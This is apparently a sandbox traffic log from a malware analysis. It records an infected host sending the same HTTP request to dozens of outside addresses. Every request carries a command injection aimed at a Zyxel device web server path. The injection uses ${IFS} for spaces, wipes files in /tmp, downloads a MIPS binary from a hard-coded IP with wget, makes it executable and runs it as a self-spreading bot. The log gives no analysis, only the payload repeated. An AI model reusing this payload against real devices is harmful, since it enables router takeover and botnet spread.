                                            Jan 14, 2024 15:50:36.363020897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3513192.168.2.2340918141.218.170.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363048077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3514192.168.2.2358968199.205.144.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363079071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3515192.168.2.235920859.204.41.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363132954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3516192.168.2.2352022107.149.243.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363173962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3517192.168.2.2335178210.199.95.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363195896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3518192.168.2.2335248130.255.57.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363229036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3519192.168.2.235602023.227.69.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363260984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3520192.168.2.2336340184.48.254.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363276005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3521192.168.2.2345712207.28.148.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363322973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3522192.168.2.234249881.0.85.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363357067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3523192.168.2.235890439.26.246.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363383055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3524192.168.2.2350328149.129.148.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363416910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3525192.168.2.2355640109.113.134.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363451004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3526192.168.2.2338992192.204.161.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363477945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3527192.168.2.235128491.87.166.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363512039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3528192.168.2.235605088.242.164.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363564968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3529192.168.2.235189284.105.92.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363584042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3530192.168.2.2355358121.205.188.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363619089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3531192.168.2.2345538182.37.39.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363670111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3532192.168.2.2355950121.51.162.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363687038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3533192.168.2.2333056107.71.45.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363712072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3534192.168.2.2354866199.99.82.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363753080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3535192.168.2.2348120167.226.232.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363753080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3536192.168.2.2351536115.46.110.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363785982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3537192.168.2.2341634205.45.149.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363820076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3538192.168.2.2345782120.243.19.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363869905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3539192.168.2.2343330213.38.84.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363878965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3540192.168.2.2346258121.4.38.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363910913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3541192.168.2.2350452163.232.182.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363966942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3542192.168.2.2346182105.25.127.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363984108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3543192.168.2.233739240.214.195.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364003897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3544192.168.2.235601873.228.137.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364031076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3545192.168.2.2346046169.245.151.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364057064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3546192.168.2.234929417.174.188.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364111900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3547192.168.2.234313299.247.127.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364136934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3548192.168.2.2333138146.150.8.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364166021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3549192.168.2.2350618165.67.90.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364173889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3550192.168.2.2349126218.146.111.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364208937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3551192.168.2.233955842.51.172.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364239931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3552192.168.2.2358578195.89.191.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364247084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3553192.168.2.2341248155.61.4.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364273071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3554192.168.2.2348104219.211.250.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364320040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3555192.168.2.23588528.52.82.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364357948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3556192.168.2.2342698193.13.47.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364372969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3557192.168.2.2353724184.30.6.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364398956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3558192.168.2.234212644.135.41.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364414930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3559192.168.2.2351272197.74.114.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364470005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3560192.168.2.2354284124.188.102.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364478111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3561192.168.2.234297889.113.78.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364540100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3562192.168.2.2342640108.230.165.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364556074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3563192.168.2.2338092216.12.90.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364573956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3564192.168.2.2334928146.167.211.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.364639997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3565192.168.2.2354764117.51.15.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.371965885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3566192.168.2.234776673.150.171.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.371994972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3567192.168.2.2348072164.46.246.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372025967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3568192.168.2.2341430183.195.140.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372056007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3569192.168.2.2343040185.225.16.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372111082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3570192.168.2.2356248188.26.205.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372133017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3571192.168.2.2337982155.130.226.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372159958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3572192.168.2.2341142177.238.104.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372159958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3573192.168.2.2347102199.45.27.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372215986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3574192.168.2.2333170126.0.87.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372245073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3575192.168.2.234651294.90.105.231443
                                            TimestampBytes transferredDirectionData
